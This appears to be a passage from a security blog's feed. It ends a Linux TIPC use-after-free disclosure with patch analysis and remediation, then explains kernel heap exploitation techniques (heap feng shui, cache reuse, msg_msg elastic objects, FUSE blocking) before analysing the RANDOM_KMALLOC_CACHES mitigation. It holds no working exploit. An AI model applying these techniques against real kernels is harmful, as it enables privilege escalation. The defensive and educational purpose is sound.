</span></span><span class="line"><span class="cl">        <span class="nf">kfree_skb_partial</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">headstolen</span><span class="p">);</span>                  <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>                                                  <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">tail</span> <span class="o">=</span> <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frag_list</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span>
</span></span><span class="line"><span class="cl">            <span class="n">tail</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">truesize</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">truesize</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">LAST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">validated</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">tipc_msg_validate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">head</span><span class="p">)))</span>
</span></span><span class="line"><span class="cl">            <span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>                                          <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="c1">// before the patch: *buf = NULL;                         [1]
</span></span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nl">err</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">headbuf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>net/tipc/msg.c (it&rsquo;s not on elixir yet, but will link)</p>
<p>So if we recall our vulnerable case, after we&rsquo;ve chained our last fragment, if the TIPC header of the fragmented message (which is now assembled) is invalid, we hit the error case at [0]. We then go to <code>err:</code> and cause the UAF, as <code>buf</code> was never cleared at [1].</p>
<p>By the time we reach [2] we know that the input skb is a trailing fragment and is reference by both <code>buf</code> and <code>frag</code>. At this point we don&rsquo;t need the <code>buf</code> reference as the following block handles the input skb appropriately via <code>frag</code>: either it is coalesced into <code>head</code> and freed [3] or it is added to <code>head</code>&rsquo;s frag list at which point <code>head</code> is responsible for it [4].</p>
<p>As a result, we can just clear the unnecessary <code>buf</code> reference before it can cause any trouble. Hopefully that&rsquo;s not too convoluted an explanation for a simple patch!</p>
<h3 id="remediation">Remediation</h3>
<p>Chances are, as I mentioned up top, unless you&rsquo;re running TIPC you&rsquo;re all good! However, if you are, or want to be extra safe, prior to a patch being made available, the TIPC module can be disabled from loading if not in use:</p>
<ul>
<li><code>$ lsmod | grep tipc</code> will let you know if the module is currently loaded,</li>
<li><code>modprobe -r tipc</code> may allow you to unload the module if loaded, however you may need to reboot your system</li>
<li><code>$ echo &quot;install tipc /bin/true&quot; &gt;&gt; /etc/modprobe.d/disable-tipc.conf</code> will prevent the module from being loaded, which is a good idea if you have no reason to use it</li>
</ul>
<h2 id="wrapup">Wrapup</h2>
<p><img src="https://sam4k.com/content/images/2024/04/i_think_our_work_here_is_done.gif" alt=""></p>
<p>As always, thank you for surviving up until this point! This research has been super fun, hopefully this has been an interesting read and not missing <em>too</em> much context; I appreciate it&rsquo;s a particularly complex topic with lots of moving parts. Also, this was somewhat rushed due to having a lot going on at the moment, so I apologise for any drop in quality!</p>
<p>I&rsquo;d like to thank ZDI and the Linux kernel maintainers for the work involved in getting this vulnerability disclosed and patched!</p>
<p>There&rsquo;s quite a few things I&rsquo;d love to do in follow-up to this post, if I can only find the time! I&rsquo;d be happy to go into more detail on the discovery process and working with syzkaller, I <em>really</em> want to play around with exploitation and I also think it&rsquo;d be neat to expand the Linternals blog series with some networking content!</p>
<p>In the meanwhile, if you&rsquo;re interested in modifying syzkaller, checkout <a href="https://x.com/notselwyn/">@notselwyn</a>&rsquo;s post on &ldquo;<a href="https://pwning.tech/ksmbd-syzkaller/#4-adding-kcov-support-to-ksmbd">Tickling ksmbd: fuzzing SMB in the Linux kernel</a>&rdquo;, I found it super helpful!</p>
<p>Feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Exploring Linux's New Random Kmalloc Caches</title><description>Let&amp;#39;s explore the modern kernel heap exploitation meta and how the new RANDOM_KMALLOC_CACHES tries to address it.</description><link>https://sam4k.com/exploring-linux-random-kmalloc-caches/</link><guid isPermaLink="false">651b253092020209c38fcfed</guid><category>linux</category><category>kernel</category><category>memory</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 03 Nov 2023 14:10:43 +0000</pubDate><media:content url="https://sam4k.com/content/images/2023/10/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<p>In this post we&rsquo;re going to be taking a look at the state of contemporary kernel heap exploitation and how the new opt-in hardening feature added in the 6.6 Linux kernel, <code>RANDOM_KMALLOC_CACHES</code>, looks to address that.</p>
<p>To provide some context to the problems <code>RANDOM_KMALLOC_CACHES</code> tries to address, we&rsquo;ll spend a bit of time covering the current heap exploitation meta. This actually ended up being reasonably in-depth (oops) and touches on general approaches to exploitation as well as current mitigations and techniques such as heap feng shui, cache reuse attacks, FUSE and making use of elastic objects.</p>
<p>Armed with that information we&rsquo;ll then explore the new patch in detail, discuss how it addresses heap exploitation and have a bit of fun speculating how the meta might shift as a result of this.</p>
<p>As this post is focusing on kernel heap exploitation, I&rsquo;ll be assuming some prerequisite knowledge around topics like kernel memory allocators (luckily for you I&rsquo;ve written about this already in some detail as part of Linternals, <a href="https://sam4k.com/linternals-introduction/#contents">here</a>).</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#current-heap-exploitation-meta">Current Heap Exploitation Meta</a>
<ul>
<li><a href="#approaching-heap-exploitation">Approaching Heap Exploitation</a></li>
<li><a href="#current-mitigations">Current Mitigations</a></li>
<li><a href="#generic-techniques">Generic Techniques</a>
<ul>
<li><a href="#basic-heap-feng-shui">Basic Heap Feng Shui</a></li>
<li><a href="#cache-reuseoverflow-attacks">Cache Reuse Attacks</a></li>
<li><a href="#elastic-objects">Elastic Objects</a></li>
<li><a href="#fuse">FUSE</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</a></li>
<li><a href="#diving-into-the-implementation">Diving Into The Implementation</a>
<ul>
<li><a href="#cache-setup">Cache Setup</a></li>
<li><a href="#seed-setup">Seed Setup</a></li>
<li><a href="#kmalloc-allocations">Kmalloc Allocations</a></li>
<li><a href="#thoughts">Thoughts</a></li>
</ul>
</li>
<li><a href="#whats-the-new-meta">What&rsquo;s The New Meta?</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<h2 id="current-heap-exploitation-meta">Current Heap Exploitation Meta</h2>
<p><img src="https://sam4k.com/content/images/2023/10/need_context.gif" alt=""></p>
<p>Alright, before we dive into the juicy details lets quickly touch on the current state of heap exploitation to help us understand why this patch was added and how it effects things!</p>
<p>Heap corruption is one of the more common types of bugs found in the kernel today (think use-after-free, heap overflow etc.). When we talk about heap corruption in the Linux kernel, we&rsquo;re referring to memory dynamically allocated via the slab allocator (e.g. <code>[kmalloc()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590)</code>) or directly via the page allocator (e.g. <code>[alloc_pages()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/gfp.h#L269)</code>).</p>
<p>The fundamental goal of exploitation is to leverage our heap corruption to gain more control over the system, typically to elevate our privileges or at least get closer to being able to do so.</p>
<p>In reality, these heap corruptions can come in all shapes and sizes. The objects we&rsquo;re able to use-after-free can come from different caches, there may be a race involved, there may be fields which need to be specific values etc. Similarly our overflows can also have any number of constraints which impact our approach to leverage the corruption.</p>
<p>However, there exist a number of generic techniques for heap exploitation, which help cut down on the time needed to go from heap corruption to working exploit. As we know, security is a cat and mouse game, so these techniques are continually adapting to keep up with new mitigations.</p>
<p>From a defenders perspective, in an ideal world we would mitigate heap corruption bugs entirely. Failing that, we can make it as hard as possible for attackers to leverage any heap corruption bugs they do find. Responding to the generic techniques used by attackers is a good way to go about this, forcing each bug to require a bespoke approach to exploit.</p>
<h3 id="approaching-heap-exploitation">Approaching Heap Exploitation</h3>
<p><img src="https://sam4k.com/content/images/2023/10/i_want_details.gif" alt=""></p>
<p>Okay with the exposition out of the way, lets talk a bit about how we might go about exploiting a heap corruption in the kernel nowadays. I&rsquo;m going to (try) keep things fairly high level, with a focus on the slab allocator side of things due to the topics context.</p>
<p>So first things first we want to make sure we understand the bug itself: how do we reach it, what kernel configurations or capabilities do we require? What is the nature of the corruption, is it a use-after-free? What are the limitations around triggering the bug? What data structures are effected, what are the risks of a kernel panic?</p>
<p>Then we want to get into the specifics of the heap corruption itself. How are the affected objects allocated? Is it via the slab allocator or the page allocator? For slab allocations, we&rsquo;re interested in what cache the object is allocated to, so we can infer what other objects share the same cache and can potentially be corrupted.</p>
<p>There are several factors to consider at the moment when determining what cache our object will end up in:</p>
<ul>
<li><strong>The API used</strong> will tell us if its allocated into a general purpose cache with other similar sized objects (<code>kmalloc()</code>, <code>kzalloc()</code>, <code>kcalloc()</code> etc.) or private cache ( <code>[kmem_cache_alloc()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L499)</code>) with slabs containing only objects of that type.</li>
<li><strong>The GFP (Get Free Page) flags</strong> used can tell us which of the general purpose cache types the object is allocated. By default, allocations will go to the standard general purpose caches, <code>kmalloc-x</code>, where x is the &ldquo;bucket size&rdquo;. The other common case is <code>GFP_KERNEL_ACCOUNT</code>, typically used for untrusted allocations<a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">[1]</a>, will put objects in an accounted cache, named <code>kmalloc-cg-x</code>.</li>
<li><strong>The size of the object</strong> will determine, for general purpose caches, which &ldquo;bucket size&rdquo; the object will end up in. The <code>x</code> in <code>kmalloc-x</code> denotes the fixed size in bytes allocated to each object in the cache&rsquo;s slabs. Objects will be allocated into the smallest general purpose cache is can fit into.</li>
</ul>
<p>Now we&rsquo;ve built up an understanding of the bug and how it&rsquo;s allocated, it&rsquo;s time to think about how we want to use our corruption. By knowing what cache our object is in, we know what other objects can or can&rsquo;t be allocated into the same slab.</p>
<p>The general goal here is to find a viable object to corrupt. We can use our understanding of how the slab allocator works in order to shape the layout of memory to make this more reliable, or to make otherwise incorruptible objects corruptible.</p>
<h3 id="current-mitigations">Current Mitigations</h3>
<p><img src="https://sam4k.com/content/images/2023/10/wait_wait_wait.gif" alt=""></p>
<p>However, before we get ahead of ourselves, we first have to consider any mitigations that might impact our ability to exploit our bug on modern systems. This won&rsquo;t be an exhaustive list, but will help provide some context on the current meta:</p>
<ul>
<li><code>[CONFIG_SLAB_FREELIST_HARDENED](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html)</code> adds checks to protect slab metadata, such as the freelist pointers stored in free objects within a SLUB slab and checks for double-frees.</li>
<li><code>[CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html)</code> randomises the freelist order when a new cache slab is allocated, such that an attacker can&rsquo;t infer the order objects within that slab will be filled. The aim to reduce the knowledge &amp; control attackers have over heap state.</li>
<li><code>[CONFIG_STATIC_USERMODEHELPER](https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html)</code> mitigates a popular technique for leveraging heap corruption, which we&rsquo;ll touch on in the next section.</li>
<li>Slab merging, enabled via <code>slub_merge</code> bootarg or <code>CONFIG_SLAB_MERGE_DEFAULT=y</code>, allows slab caches to be merged for performance. As you can imagine, this is nice for attackers as it opens up our options for corruption.</li>
<li>Some others, which are less commonly enabled afaik, or out of scope include <code>[CONFIG_SHUFFLE_PAGE_ALLOCATOR](https://cateee.net/lkddb/web-lkddb/SHUFFLE_PAGE_ALLOCATOR.html)</code>, <code>[CONFIG_CFI_CLANG](https://cateee.net/lkddb/web-lkddb/CFI_CLANG.html)</code>, <code>init_on_alloc</code> / <code>[CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y](https://cateee.net/lkddb/web-lkddb/INIT_ON_ALLOC_DEFAULT_ON.html)</code> &amp; <code>init_on_free</code> / <code>[CONFIG_INIT_ON_FREE_DEFAULT_ON=y](https://cateee.net/lkddb/web-lkddb/INIT_ON_FREE_DEFAULT_ON.html)</code>.</li>
</ul>
<h3 id="generic-techniques">Generic Techniques</h3>
<p><img src="https://sam4k.com/content/images/2023/10/the_good_part.gif" alt=""></p>
<p>Okay, now we&rsquo;re ready to starting pwning the heap. We understand our bug, the allocation context and the kind of mitigations we&rsquo;re dealing with. Let&rsquo;s explore some contemporary techniques used to get around this mitigation and exploit heap corruptions bugs!</p>
<h4 id="basic-heap-feng-shui">Basic Heap Feng Shui</h4>
<p>A fundamental aspect of heap corruption is the ability to shape the heap, commonly referred to as &ldquo;heap feng shui&rdquo;. We can use our understanding of how the allocator works and the mitigations in place to try get things where we want them in the heap.</p>
<p>Lets use a generic heap overflow to demonstrate this. We can overflow object <code>x</code> and we want to corrupt object <code>y</code>. They&rsquo;re in the same generic cache, so our goal is to land <code>y</code> adjacent to <code>x</code> in the same slab.</p>
<p>We want to consider how active the cache is (aka is it cache noise) and up-time, as this will give us an idea of the cache slab state. On a typical workload with a fairly used cache size, we can assume there are likely to be several partially filled slabs; this is our starting state.</p>
<p><img src="https://sam4k.com/content/images/2023/10/1_partial_slabs.png" alt=""></p>
<p>A basic heap feng shui approach would be to first allocate a number of object <code>y</code> to fill up the holes in the partial slabs:</p>
<p><img src="https://sam4k.com/content/images/2023/10/2_filled_partials.png" alt=""></p>
<p>Then, we allocate several slabs worth of object <code>y</code> which we can assume is to trigger new slabs to be allocated, hopefully filled with object <code>y</code>:</p>
<p><img src="https://sam4k.com/content/images/2023/10/3_filled_new_slabs.png" alt=""></p>
<p>Then, from the second batch of allocations into new slabs, we would free every other allocation to try and create holes in the new slabs:</p>
<p><img src="https://sam4k.com/content/images/2023/10/4_holes.png" alt=""></p>
<p>We would then allocate our vulnerable object <code>x</code> in the hopes we have increased our chances that it will be allocated into one of the wholes we just created:</p>
<p><img src="https://sam4k.com/content/images/2023/10/5_landed.png" alt=""></p>
<h4 id="cache-reuseoverflow-attacks">Cache Reuse/Overflow Attacks</h4>
<p>Remember earlier we mentioned how there are different types of general purpose caches and even private caches, all with their own slabs? What if our vulnerable object is in one cache and we found an object we really, <em>really</em> wanted to corrupt in another cache?</p>
<p>If we recall our memory allocator fundamentals<a href="https://sam4k.com/linternals-memory-allocators-part-1/">[2]</a>, we know that the page allocator is the fundamental memory allocator for the Linux kernel, sitting above it is the slab allocator. So the slab allocator makes use of the page allocator, this includes for the allocation of the chunks of memory used as slabs (to hold cache objects). Are you still with me?</p>
<p>So when all the objects in a slab are freed, the slab itself may in turn be freed back to the page allocator, ready to be reallocated. Can you see where this is going?</p>
<p><img src="https://sam4k.com/content/images/2023/10/bill_hader_omg.gif" alt=""></p>
<p>If we have a UAF on an object in a private cache slab, if that slab is then freed and reallocated as a general purpose cache, suddenly our UAF&rsquo;d memory is pointing to general purpose objects! Our options for corruption have suddenly expanded!</p>
<p>This kind of technique is known as a &ldquo;cache reuse&rdquo; attack and has been documented previously in more detail<a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">[3]</a>. By using a similar approach of manipulating the underlying page layout, &ldquo;cache overflow&rdquo; attacks are possible too, where you align to slabs from separate caches adjacent to one another in physical memory, which has been used in some great CTF writeups<a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">[4]</a>.</p>
<h4 id="elastic-objects">Elastic Objects</h4>
<p>Another cornerstone of contemporary heap exploitation is the use of &ldquo;elastic objects&rdquo;[6]. These are essential structures that have a dynamic size, typically a length field will describe the size of a buffer within the same struct.</p>
<p>Sounds pretty straight forward, right? Why is this relevant? Well, we&rsquo;ve spoken about the bespoke nature of heap corruption vulnerabilities, and the variety of cache types and sizes.</p>
<p>Elastic objects can provide generic techniques to exploiting these vulnerabilities, as objects that can be corrupted across a variety of cache sizes due to their elastic nature. By generalising the object being corrupted, a lot of time can be spent mining for objects that are corruptible for a certain cache size and then developing a bespoke technique for using that specific corruption to elevate privileges (which can be quite time consuming!).</p>
<p>A popular elastic object used on contemporary heap corruption is <code>[struct msg_msg](https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9)</code>, which can be used to leverage an out-of-bounds heap write into arbitrary read/write<a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">[5]</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/* one msg_msg structure for each message */
</span></span><span class="line"><span class="cl">struct msg_msg {
</span></span><span class="line"><span class="cl">	struct list_head m_list;
</span></span><span class="line"><span class="cl">	long m_type;
</span></span><span class="line"><span class="cl">	size_t m_ts;		/* message text size */
</span></span><span class="line"><span class="cl">	struct msg_msgseg *next;
</span></span><span class="line"><span class="cl">	void *security;
</span></span><span class="line"><span class="cl">	/* the actual message follows immediately */
</span></span><span class="line"><span class="cl">};
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9">include/linux/msg.h</a> (v6.6)</p>
<h4 id="fuse">FUSE</h4>
<p><img src="https://sam4k.com/content/images/2023/10/theresmore.gif" alt=""></p>
<p>Seeing as we&rsquo;re going all out on the exploitation techniques here, I might as well throw in a <em><strong>quick</strong></em> shoutout to FUSE as well, which is commonly used in kernel exploitation.</p>
<p>Filesystem in Userspace is &ldquo;is an interface for userspace programs to export a filesystem to the Linux kernel.&rdquo;<a href="https://github.com/libfuse/libfuse">[7]</a>, enabled via <code>[CONFIG_FUSE_FS](https://cateee.net/lkddb/web-lkddb/FUSE_FS.html)=y</code>. Essentially it allows, often unprivileged, users to define their own filesystems.</p>
<p>Normally, mounting filesystems is a privileged action and actually defining a filesystem would require you to write kernel code. With FUSE, we can do away with this. By defining the read operations in our FUSE FS, we&rsquo;re able to define what happens when kernel tries to read one our FUSE files, which includes sleeping&hellip;</p>
<p>This gives us the ability to arbitrarily block kernel threads that try to read files in our FUSE FS (essentially accessing to user virtual addresses we can control, as we can map in one of our FUSE files and pass that over to the kernel).</p>
<p>So what does this have to do with kernel exploitation? Well, as we mentioned previously, a key part of heap exploitation is finding interesting objects to corrupt or control the layout of memory. Ideally we want to be able to allocate and free these on demand, if they&rsquo;re immediately freed there&rsquo;s not too much we can do with them &hellip; right?</p>
<p>Perhaps! This is where FUSE comes in: if we have a scenario where an object we <em>really, really</em> want to corrupt is allocated and freed within the same system call, we may be able to keep it in memory if there&rsquo;s a userspace access we can block on between the allocation and free! You can find more on this, plus some examples, from this <a href="https://duasynt.com/blog/linux-kernel-heap-spray">2018 Duasynt blog post</a>.</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst</a></li>
<li><a href="https://sam4k.com/linternals-memory-allocators-part-1/">https://sam4k.com/linternals-memory-allocators-part-1/</a></li>
<li><a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022</a></li>
<li><a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html</a></li>
<li><a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html</a></li>
<li>the earliest mention i&rsquo;m aware of in an kernel xdev context is from the 2020 paper, <a href="https://zplin.me/papers/ELOISE.pdf">&ldquo;A Systematic Study of Elastic Objects in Kernel Exploitation&rdquo;</a>, could we be wrong tho</li>
<li><a href="https://github.com/libfuse/libfuse">https://github.com/libfuse/libfuse</a></li>
<li><a href="https://duasynt.com/blog/linux-kernel-heap-spray">https://duasynt.com/blog/linux-kernel-heap-spray</a></li>
</ol>
<h2 id="introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</h2>
<p><img src="https://sam4k.com/content/images/2023/10/startin_simple-1.gif" alt=""></p>
<p>Well, that was quite the background read (sorry not sorry), but we&rsquo;re hopefully in a good position to dive into this new mitigation: <strong>Random kmalloc caches</strong><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">[1]</a>.</p>
<p>This mitigation effects the generic slab cache implementation. Previously, there was a single generic slab cache for each size &ldquo;step&rdquo;: <code>kmalloc-32</code>, <code>kmalloc-64</code>, <code>kmalloc-128</code> etc. Such that an 40 byte object, allocated via <code>kmalloc()</code>, with the correct GFP flags, is always going to end up in the <code>kmalloc-64</code> cache. Straightforward right?</p>
<p><code>CONFIG_RANDOM_KMALLOC_CACHES=y</code> introduces multiple generic slab caches for each size, 16 by default (named <code>kmalloc-rnd-01-32</code>, <code>kmalloc-rnd-02-32</code> etc.). When an object allocated via <code>kmalloc()</code> it is allocated to one of these 16 caches &ldquo;randomly&rdquo;, depending on the callsite for the <code>kmalloc()</code> and a per-boot seed.</p>
<p>Developed by Huawei engineers, this mitigation aims to make exploiting slab heap corruption vulnerabilities more difficult. By distributing the available general purpose objects for heap feng shui for any given cache size non-deterministically across up to 16 different caches, it&rsquo;s harder for an attacker to target specific objects or caches for exploitation.</p>
<p>If you&rsquo;re interested in more information, you can also follow the initial discussions over on the Linux kernel mailing list.<a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[2]</a><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[3]</a><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[4]</a></p>
<hr>
<ol>
<li><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe</a></li>
<li><a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[PATCH RFC] Randomized slab caches for kmalloc()</a></li>
<li><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[PATCH RFC v2] Randomized slab caches for kmalloc()</a></li>
<li><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[PATCH v5] Randomized slab caches for kmalloc()</a></li>
</ol>
<h2 id="diving-into-the-implementation">Diving Into The Implementation</h2>
<p><img src="https://sam4k.com/content/images/2023/10/about_to_get_real_2-1.gif" alt=""></p>
<p>The time has come, I&rsquo;m sure you&rsquo;ve all been chomping at the bit for the last 2000 words, let&rsquo;s dig into the implementation for this patch and see what the deal is.</p>
<p>Honestly the implementation for this mitigation is actually pretty straight forward, with only 97 additions and 15 deletions across 7 files, so more than anything it&rsquo;s going to be a bit of a primer on the parts of the kmalloc API that are effected by this patchset.</p>
<p>We&rsquo;ll follow up with a bit of an analysis on the pros and cons of the implementation tho.</p>
<h3 id="cache-setup">Cache Setup</h3>
<p>So first things first lets touch on how the kmalloc caches are actually created by the kernel and some of the changes needed to include the random cache copies.</p>
<p>The header additions include configurations for things like the number of cache copies:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span>	<span class="mi">15</span> <span class="c1">// # of cache copies
</span></span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="k">else</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span>	<span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span></code></pre></div><p>The <code>[kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363)</code> enum is used to manage the different kmalloc cache types. <code>[create_kmalloc_caches()](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956)</code> allocates the initial <code>[struct kmem_cache](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slub_def.h#L98)</code> objects, which represent the slab caches we&rsquo;ve been talking about, which are then stored in the exported <code>[struct kmem_cache *   kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L677)</code> array. As we can see from the definition, the cache type is used as one of the indexes into the array to fetch a cache, the other is the size index for that cache type (see <code>[size_index[24]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L692)</code>).</p>
<p>With that in mind, an entry for each of the cache copies is added to <code>[enum kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363)</code> so that they&rsquo;re created and fetchable as part of the existing API:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">enum</span> <span class="n">kmalloc_cache_type</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_NORMAL</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifndef CONFIG_ZONE_DMA
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_DMA</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="cp">#ifndef CONFIG_MEMCG_KMEM
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_CGROUP</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="o">+</span>	<span class="n">KMALLOC_RANDOM_START</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>	<span class="n">KMALLOC_RANDOM_END</span> <span class="o">=</span> <span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_TINY
